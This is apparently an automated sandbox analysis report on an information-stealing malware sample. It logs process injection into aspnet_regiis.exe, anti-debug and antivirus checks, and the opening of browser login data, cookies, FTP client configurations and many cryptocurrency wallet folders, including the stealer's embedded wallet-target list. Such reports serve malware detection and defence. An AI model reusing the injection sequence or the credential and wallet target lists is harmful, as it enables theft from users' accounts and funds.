                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A1D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02A1D98C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A2762E SetUnhandledExceptionFilter,3_2_02A2762E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA9B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6CA9B66C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA9B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6CA9B1F7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC4AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6CC4AC62
                      Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A00000 protect: page execute and read and write
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5BABD0 GetGameData,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,Wow64GetThreadContext,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,0_2_6D5BABD0
                      Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A00000 value starts with: 4D5A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_02A124A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A1257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_02A1257F
                      Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A00000
                      Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A01000
                      Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A30000
                      Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A3D000
                      Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2C70000
                      Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2C71000
                      Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 29B5008
                      Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5CDBC8 cpuid 0_2_6D5CDBC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_02A10DDB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_02A2B2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,3_2_02A2B268
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_02A29A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,3_2_02A253E3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,3_2_02A2AB40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_02A2B0CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_02A2B1C1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoA,3_2_02A2E6A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,3_2_02A2B623
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_02A2B494
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,3_2_02A2749C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_02A2B580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_02A2B5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_02A28DC4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_02A29D6E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,3_2_02A2E56F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_02A27576
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: EnumSystemLocalesA,3_2_02A2B556
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5CD64B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6D5CD64B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A10C53 GetProcessHeap,RtlAllocateHeap,GetUserNameA,3_2_02A10C53
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A10D2E GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,3_2_02A10D2E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.file.exe.6d5e2000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.6d5e2000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.aspnet_regiis.exe.2a00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.6d5b0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Binance\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                      Source: Yara match File source: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match File source: sslproxydump.pcap, type: PCAP
                      Source: Yara match File source: 0.2.file.exe.6d5e2000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.file.exe.6d5e2000.6.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.aspnet_regiis.exe.2a00000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.file.exe.6d5b0000.4.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
